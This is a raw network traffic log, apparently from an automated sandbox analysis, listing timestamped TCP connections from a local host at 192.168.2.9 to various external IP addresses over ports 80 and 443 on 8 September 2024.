                                                                                                                                                                                                          Sep 8, 2024 10:53:28.131496906 CEST4975080192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.136492014 CEST804975064.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.136559963 CEST4975080192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.136703968 CEST4975080192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.141506910 CEST804975064.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.247282028 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.252095938 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.252190113 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.252382994 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.257181883 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.285410881 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.293956995 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.294048071 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.294235945 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.299123049 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.727364063 CEST804975064.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.727514982 CEST4975080192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777215958 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777278900 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777296066 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.777333021 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.789267063 CEST4975280192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.794070959 CEST804975244.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.136063099 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.136127949 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.137320995 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.142168999 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.450045109 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.450109959 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.862541914 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.867328882 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.867408037 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.867739916 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.872512102 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475028038 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475177050 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475194931 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475311041 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.477324009 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.482112885 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.738254070 CEST6079980192.168.2.915.197.240.20
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.743776083 CEST806079915.197.240.20192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.744082928 CEST6079980192.168.2.915.197.240.20
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.744252920 CEST6079980192.168.2.915.197.240.20
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.749908924 CEST806079915.197.240.20192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.096755981 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.101613045 CEST8060800103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.101687908 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.101811886 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.107418060 CEST8060800103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.223045111 CEST806079915.197.240.20192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.223108053 CEST6079980192.168.2.915.197.240.20
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.871697903 CEST6080180192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.876593113 CEST8060801199.59.243.226192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.876723051 CEST6080180192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.878065109 CEST6080180192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.882832050 CEST8060801199.59.243.226192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.033274889 CEST8060800103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.033351898 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.033371925 CEST8060800103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.033422947 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.035646915 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.040489912 CEST8060800103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.331448078 CEST8060801199.59.243.226192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.331476927 CEST8060801199.59.243.226192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.331545115 CEST6080180192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.331577063 CEST6080180192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:53:36.407073021 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:36.407304049 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.301192045 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.306027889 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.306108952 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.306317091 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.311094046 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983392000 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983412027 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983422995 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983474970 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983485937 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983495951 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983506918 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983519077 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983515024 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983530998 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983580112 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.983627081 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.985940933 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.988478899 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.988497972 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.988507986 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.988528013 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.988548040 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080707073 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080720901 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080733061 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080741882 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080753088 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080785036 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080857992 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080910921 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080920935 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080929995 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080970049 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.080970049 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.081454992 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.081465960 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.081475973 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.081505060 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.081527948 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.668081045 CEST6330780192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.672918081 CEST806330764.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.673019886 CEST6330780192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.673578024 CEST6330780192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.678623915 CEST806330764.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.985591888 CEST6330880192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.990663052 CEST806330872.52.179.174192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.990746975 CEST6330880192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.990981102 CEST6330880192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.995834112 CEST806330872.52.179.174192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.253474951 CEST806330764.225.91.73192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.253542900 CEST6330780192.168.2.964.225.91.73
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.507307053 CEST806330872.52.179.174192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.507370949 CEST6330880192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.507457018 CEST6330880192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.512290955 CEST806330872.52.179.174192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.516997099 CEST6330980192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.521899939 CEST806330972.52.179.174192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.521962881 CEST6330980192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.522095919 CEST6330980192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:39.526829004 CEST806330972.52.179.174192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.017564058 CEST806330972.52.179.174192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.017636061 CEST6330980192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.017868042 CEST6330980192.168.2.972.52.179.174
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.022641897 CEST806330972.52.179.174192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:42.984625101 CEST806080264.190.63.136192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:42.984684944 CEST6080280192.168.2.964.190.63.136
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.163256884 CEST6331080192.168.2.952.34.198.229
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.168041945 CEST806331052.34.198.229192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.168153048 CEST6331080192.168.2.952.34.198.229
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.168303013 CEST6331080192.168.2.952.34.198.229
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.173075914 CEST806331052.34.198.229192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.331088066 CEST8060801199.59.243.226192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.331137896 CEST6080180192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.922024012 CEST806331052.34.198.229192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.922106028 CEST806331052.34.198.229192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.922151089 CEST6331080192.168.2.952.34.198.229
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.924644947 CEST6331080192.168.2.952.34.198.229
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.930054903 CEST806331052.34.198.229192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.230384111 CEST6331180192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.235310078 CEST806331144.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.235380888 CEST6331180192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.527384043 CEST6331180192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.532413960 CEST806331144.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.707879066 CEST806331144.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.707994938 CEST6331180192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.708039999 CEST806331144.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.708084106 CEST6331180192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.721626043 CEST6331180192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.726548910 CEST806331144.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.263679981 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.264389038 CEST5733580192.168.2.9199.191.50.83
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268599987 CEST805733469.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268677950 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268870115 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.269182920 CEST8057335199.191.50.83192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.269232988 CEST5733580192.168.2.9199.191.50.83
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.269407988 CEST5733580192.168.2.9199.191.50.83
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.273678064 CEST805733469.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.274178028 CEST8057335199.191.50.83192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.306930065 CEST5733680192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.311757088 CEST80573363.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.311844110 CEST5733680192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.312402964 CEST5733680192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.317205906 CEST80573363.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.319539070 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.319864035 CEST5733780192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.320975065 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.321410894 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.324029922 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.324258089 CEST5733980192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.324402094 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.324676991 CEST8057337154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.324758053 CEST5733780192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326114893 CEST8049715208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326131105 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326191902 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326230049 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326431990 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.328105927 CEST4972580192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.328346968 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329540968 CEST8049707188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329555988 CEST8057339188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329591990 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329731941 CEST5733980192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329917908 CEST5733980192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.331171989 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333199024 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333254099 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333312988 CEST80497253.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333359957 CEST4972580192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333750963 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.334642887 CEST8057339188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.338556051 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.340037107 CEST5733780192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.344949961 CEST8057337154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.347502947 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.347799063 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.352590084 CEST8057341162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.352658987 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.352837086 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.357601881 CEST8057341162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.649300098 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790457964 CEST805733469.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790597916 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790865898 CEST805733469.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790919065 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.791980028 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.796761036 CEST805733469.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.818684101 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.821403980 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.852519989 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.857408047 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.964428902 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.964494944 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.970581055 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.970655918 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.076623917 CEST8057341162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.076726913 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.258678913 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.286087036 CEST8057337154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.286144972 CEST5733780192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.362303972 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.362584114 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.367954969 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.368037939 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.368252993 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.374229908 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.532174110 CEST8057339188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.532244921 CEST5733980192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.664918900 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.901619911 CEST57343443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.901678085 CEST44357343188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.901763916 CEST57343443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.902812004 CEST57343443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.902823925 CEST44357343188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.979286909 CEST5733780192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.979569912 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.984143972 CEST8057337154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.984297037 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036604881 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036645889 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036658049 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036669970 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036683083 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036695004 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036708117 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036708117 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036720991 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036721945 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036736012 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036744118 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036748886 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036762953 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036770105 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036793947 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036813974 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041578054 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041604042 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041634083 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041665077 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128845930 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128892899 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128912926 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128925085 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128936052 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128954887 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128968000 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128969908 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128979921 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128994942 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.129036903 CEST5734280192.168.2.991.195.240.19
